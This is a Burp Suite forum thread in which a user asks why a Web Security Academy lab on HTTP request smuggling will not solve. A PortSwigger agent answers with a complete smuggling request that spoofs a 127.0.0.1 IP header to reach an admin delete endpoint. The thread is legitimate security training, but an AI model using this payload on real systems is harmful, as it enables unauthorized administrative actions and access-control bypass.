Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

Adam | Last updated: Nov 27, 2021 04:51AM UTC

Hello, I have followed everything exactly as written in the tutorial and in the video. At the end of the video Michael Sommer says "the lab is solved", but it isn't and has to keep trying and trying for two minutes and finally gets it to change to SOLVED. I'm exactly at that point. Yes, in REPEATER "Update Content-Length" is unchecked. I do have "HTTP Request Smuggler" installed. In solution #5 I couldn't see the admin panel so I went onto #6. I get to #6 in Solution: and it acknowledges the 127.0.0.1 with the "Admin interface only available if logged in as an administrator, or if requested from 127.0.0.1"...I change the 127.0.0.1 address to the one i was able to get in #3 but still unable to Solve the Lab. I had seen Michael Sommer have the same problem and solve in two minutes, but as I had followed every keystroke and after 6 hours I still can't solve it. What could I possibly be doing wrong??? Any help would be greatly appreciated, thank you.

Adam | Last updated: Nov 27, 2021 03:07PM UTC

I do have 2 spaces after x=1

Ben, PortSwigger Agent | Last updated: Nov 29, 2021 09:56AM UTC

Hi Adam, Just to confirm, it sounds like you are changing the address from 127.0.0.1 to the IP returned as a result of the request sent in step 3, is that correct? You do not need to change the IP address, you just need to add the header that is returned from the request in step 3 and give it the value 127.0.0.1 i.e. in the lab attempt I have just carried out, the header returned was X-ayZFvQ-Ip, so the final request I sent was: POST / HTTP/1.1 Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 166 Transfer-Encoding: chunked 0 GET /admin/delete?username=carlos HTTP/1.1 X-ayZFvQ-Ip: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 10 Connection: close x=1

Adam | Last updated: Nov 29, 2021 08:07PM UTC